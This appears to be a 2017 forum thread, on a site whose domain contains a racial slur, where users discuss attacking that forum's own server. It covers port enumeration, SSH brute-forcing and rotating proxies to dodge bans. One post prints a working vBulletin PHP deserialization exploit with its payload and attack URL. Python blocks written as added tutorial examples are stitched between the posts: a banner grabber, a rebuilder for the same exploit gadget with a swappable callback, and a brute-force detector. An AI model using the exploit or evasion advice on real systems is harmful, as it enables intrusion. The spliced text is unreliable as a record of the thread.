2017-02-01 at 12:18 AM UTC
Let's say, hypothetically, that I was on a mission to attack niggasin.space. Lanny had rubbed me the wrong way (sexually) and I was going after his server for revenge. If I didn't want to attack his site via a potential web application vulnerability, what other options would I have?
Let's split the question and say in one scenario that he had a bunch of ports open (like 22, 25, 80, 443, 631... all were for the default protocol), and in the other scenario he only had 80 and 443 open.
2017-02-01 at 12:23 AM UTC
DDoS and 10 trillion spambots.
2017-02-01 at 12:52 AM UTC
^Oh gawd.
New rule: no DoS-type attacks. Actual, real attacks that require at least a small amount of skill.
2017-02-01 at 1:14 AM UTC
I think I found my answer. It looks like I would have to find a vulnerability for whatever service is running on that particular port.
Is it a dead end if Lanny only had port 80 open?
2017-02-01 at 1:16 AM UTC
Attack the services running on the web server, like FTP, POP3, the mail server. Sometimes the MySQL DB listens on port 3306. You could brute-force the file server and upload malware. Or see if there is a flaw in the service you are targeting itself that can be exploited with a buffer overflow or what have you. This is why it is important to enumerate the type of service you are dealing with and the version. One such technique involves banner grabbing with the FTP service to get the version and such. Once you know the version you can look for vulnerabilities on exploit-db and similar sites. Or download the exact same thing, run it locally and bang on it/reverse engineer it until you find something.
Nexpose and Metasploit are really good at server side security testing.
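The banner-grabbing step from the post above, as an added example (not code from the thread or from any of the tools it names): connect to a port, read what the service volunteers, and map it to a product and version you can then look up. The sample banners, the fingerprint regexes and the loopback stand-in server are constructed for the demo; the real-world input is whatever the target port returns.

```python
import re
import socket
import threading

# Constructed sample banners for the demo (not captured from any real host).
# FTP, SSH and SMTP servers all speak first, so the banner arrives without
# the client sending anything; HTTP needs a probe (see grab_banner).
SAMPLE_BANNERS = {
    21: b"220 ProFTPD 1.3.5 Server (Debian) [::ffff:192.0.2.10]\r\n",
    22: b"SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2\r\n",
    25: b"220 mail.example.test ESMTP Postfix (Debian/GNU)\r\n",
}

# Service fingerprints; each regex defines a 'product' and a 'version' group.
# Coverage is illustrative, not exhaustive.
BANNER_PATTERNS = [
    ("ssh", re.compile(rb"^SSH-[\d.]+-(?P<product>OpenSSH)_(?P<version>[\w.]+)")),
    ("ftp", re.compile(rb"^220[ -].*?(?P<product>ProFTPD|vsFTPd|Pure-FTPd) (?P<version>[\d.]+)")),
    ("smtp", re.compile(rb"^220[ -].*?ESMTP (?P<product>Postfix|Exim|Sendmail)(?: (?P<version>[\d.]+))?")),
]


def grab_banner(host, port, probe=None, timeout=3.0):
    """Connect, optionally send a probe (e.g. b"HEAD / HTTP/1.0\\r\\n\\r\\n" for
    port 80), and return the first bytes the service sends back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


def parse_banner(banner):
    """Map a raw banner to service/product/version. version is None when the
    banner hides it, which is itself worth noting during enumeration."""
    raw = banner.strip().decode(errors="replace")
    for service, pattern in BANNER_PATTERNS:
        m = pattern.match(banner)
        if m:
            version = m.group("version")
            return {
                "service": service,
                "product": m.group("product").decode(),
                "version": version.decode() if version else None,
                "raw": raw,
            }
    return {"service": "unknown", "product": None, "version": None, "raw": raw}


def serve_banner(banner):
    """Throwaway loopback listener that sends one banner and hangs up, standing
    in for the remote service so the demo runs offline. Returns (host, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()


def enumerate_sample_services():
    """Grab and parse each constructed banner over a real loopback socket."""
    results = {}
    for port, banner in SAMPLE_BANNERS.items():
        host, local_port = serve_banner(banner)
        results[port] = parse_banner(grab_banner(host, local_port))
    return results


if __name__ == "__main__":
    for port, info in enumerate_sample_services().items():
        print(f"{port:>5}/tcp  {info['service']:<8} {info['product']} "
              f"{info['version']}  <- {info['raw']}")
```

Against a real host, call grab_banner(target, port) directly; the product and version strings are what you feed into an exploit-db search. A banner is self-reported and can be rewritten by the admin, so treat a version match as a lead to confirm, not proof.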
2017-02-01 at 2:20 AM UTC
Guess I'm going to have to start learning about some of these tools (Metasploit specifically). Buffer overflows as well.
2017-02-01 at 4:28 AM UTC
-SpectraL
coward
[the spuriously bluish-lilac bushman]
php << 'eof'
<?php
class vB_Database {
public $functions = array();
public function __construct()
{
$this->functions['free_result'] = 'phpinfo';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
$this->db = new vB_Database();
$this->recordset = 1;
}
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
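The PHP snippet above produces its payload with PHP's own serialize(); as an added example (not from the post, not vBulletin code), here is the same gadget rebuilt in Python so the wire format is explicit: protected property names are stored with a "\0*\0" prefix, strings carry byte lengths, and the chain is a vB_dB_Result whose protected $db is a vB_Database with functions['free_result'] pointing at a callable of the attacker's choosing, which the result object's cleanup path invokes. The PhpObject class, mangle_property and build_vb_gadget are names chosen here; the expected output is the encoded string printed in the post.

```python
from urllib.parse import quote


class PhpObject:
    """A PHP object to serialize: class name plus (name, visibility, value) props."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def mangle_property(name, visibility, cls):
    """PHP encodes visibility inside the property key: protected props are prefixed
    with "\\0*\\0", private ones with "\\0<class>\\0". Get this wrong and
    unserialize() creates a different property, so the gadget never fires."""
    if visibility == "public":
        return name
    if visibility == "protected":
        return "\0*\0" + name
    if visibility == "private":
        return "\0" + cls + "\0" + name
    raise ValueError(visibility)


def php_serialize(value):
    """Subset of PHP's serialize() sufficient for building gadget chains."""
    if isinstance(value, bool):            # must precede int: bool is a subclass of int
        return "b:%d;" % value
    if value is None:
        return "N;"
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP counts bytes, not characters
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, (list, tuple)):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle_property(name, vis, value.cls)) + php_serialize(v)
            for name, vis, v in value.props
        )
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError(type(value))


def build_vb_gadget(callback="phpinfo"):
    """Rebuild the chain from the post: vB_dB_Result -> protected $db (vB_Database)
    -> public $functions['free_result'] = callback, with $recordset as the argument
    the cleanup path passes to it."""
    db = PhpObject("vB_Database", [("functions", "public", {"free_result": callback})])
    return PhpObject("vB_dB_Result", [("db", "protected", db), ("recordset", "protected", 1)])


def gadget_param(callback="phpinfo"):
    """Value for the ?arguments= query parameter. quote() with an empty safe set
    matches PHP urlencode() for this payload (it contains no spaces or '~')."""
    return quote(php_serialize(build_vb_gadget(callback)), safe="")


if __name__ == "__main__":
    print(php_serialize(build_vb_gadget()).replace("\0", "\\0"))
    print(gadget_param())
```

Swapping the callback for another single-argument function changes only the two bytes of length prefix and the name; everything else in the chain stays as the post shows it. Note that the null bytes are invisible when printed, which is why the post shows the URL-encoded form.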
2017-02-01 at 8:53 AM UTC
Yeah, every attack has to be against some kind of service. Obviously an HTTP server is available on 80. Most servers will run SSH on 22 because for people like me, who rent a server in someone else's data center, it's literally the only way I can connect. Here at niggasin.space we allow ICMP connections and TCP connections on 22, 80, 443; everything else is firewalled from anywhere but the DB server and localhost. Nothing runs on 443, 80 is NGINX and uWSGI and 22 is sshd. Low-hanging fruit is someone leaving password login for root or a sudoer enabled so you can brute-force SSH login. No dice in this case because you'll get a blanket ban on incoming connections with like 8 failures and you can only do key-based auth, but that would be the usual initial strat.
Following that, there's a much higher chance of there being a critical bug in my homebrewed forum code, which you can read in its entirety, than in sshd, which is also open source but far better reviewed.
2017-02-01 at 3:10 PM UTC
-SpectraL
coward
[the spuriously bluish-lilac bushman]
That's why you use a "rotating IP" proxy, so you always have a different IP on every attempted connection.
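Lanny's "ban after about 8 failures" and the rotating-IP reply above, as an added example that is not Lanny's actual setup nor any tool's code: a filter over sshd log lines that counts failed password attempts in a sliding window, keyed both by source IP (what a ban defeats) and by target account (what a rotating source IP cannot hide). The log lines are constructed here in syslog format with RFC 5737 documentation addresses; the threshold, window, and ban_command helper are this example's assumptions. It assumes password authentication is enabled, since with key-only auth there are no "Failed password" events to count.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def build_sample_log():
    """Constructed sshd lines (not from any real host)."""
    lines = []
    # One source hammering root: the case an IP-keyed ban catches.
    for i in range(9):
        lines.append(f"Feb  1 00:01:{i:02d} ns sshd[{1200 + i}]: Failed password for root "
                     f"from 203.0.113.7 port {51000 + i} ssh2")
    # Eight sources, one attempt each, all against 'admin': invisible per IP,
    # obvious per target account.
    for i in range(8):
        lines.append(f"Feb  1 00:03:{i:02d} ns sshd[{1300 + i}]: Failed password for "
                     f"invalid user admin from 198.51.100.{10 + i} port {52000 + i} ssh2")
    # A legitimate key-based login, which the filter must ignore.
    lines.append("Feb  1 00:04:00 ns sshd[1400]: Accepted publickey for lanny from 192.0.2.9 "
                 "port 40000 ssh2: ED25519 SHA256:constructed")
    return lines


def parse_failures(lines):
    """Yield (timestamp, user, source_ip) for each failed password attempt."""
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            # syslog timestamps carry no year; relative ordering is all we need.
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["user"], m["ip"]


def find_bans(lines, threshold=8, window=timedelta(minutes=10)):
    """Return (ips_to_ban, accounts_to_alert_on): any key that accumulates
    `threshold` failures inside `window` trips. Accounts are only flagged,
    not locked, because locking the admin account out is a DoS the attacker
    gets for free."""
    recent_by_ip = defaultdict(deque)
    recent_by_user = defaultdict(deque)
    ban_ips, alert_users = set(), set()
    for ts, user, ip in parse_failures(lines):
        for key, table, out in ((ip, recent_by_ip, ban_ips), (user, recent_by_user, alert_users)):
            times = table[key]
            times.append(ts)
            while times and ts - times[0] > window:
                times.popleft()
            if len(times) >= threshold:
                out.add(key)
    return ban_ips, alert_users


def ban_command(ip):
    """Firewall rule for a tripped source (iptables syntax, assumed here)."""
    return f"iptables -I INPUT -s {ip} -p tcp --dport 22 -j DROP"


if __name__ == "__main__":
    ips, users = find_bans(build_sample_log())
    for ip in sorted(ips):
        print(ban_command(ip))
    for user in sorted(users):
        print(f"ALERT: {user} targeted from multiple sources")
```

On the constructed log the single-source attacker is banned and root is flagged, while the eight rotating sources never reach the per-IP threshold and only the per-account counter exposes them. The tradeoff Lanny's setup sidesteps entirely: with key-only auth there is nothing to count, and the ban is defence in depth rather than the control that matters.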
2017-02-01 at 4:35 PM UTC
-SpectraL
coward
[the spuriously bluish-lilac bushman]
Warning, though. Many "tools" have hidden author backdoors embedded in them. You play with matches, sometimes you get burnt.
2017-02-01 at 5:06 PM UTC
-SpectraL
coward
[the spuriously bluish-lilac bushman]
Some "tools" also have intelligent capabilities, whereupon if the tool detects certain people, in certain places, at certain times, under certain circumstances, it will completely fry the user's entire system and self-destruct, so beware.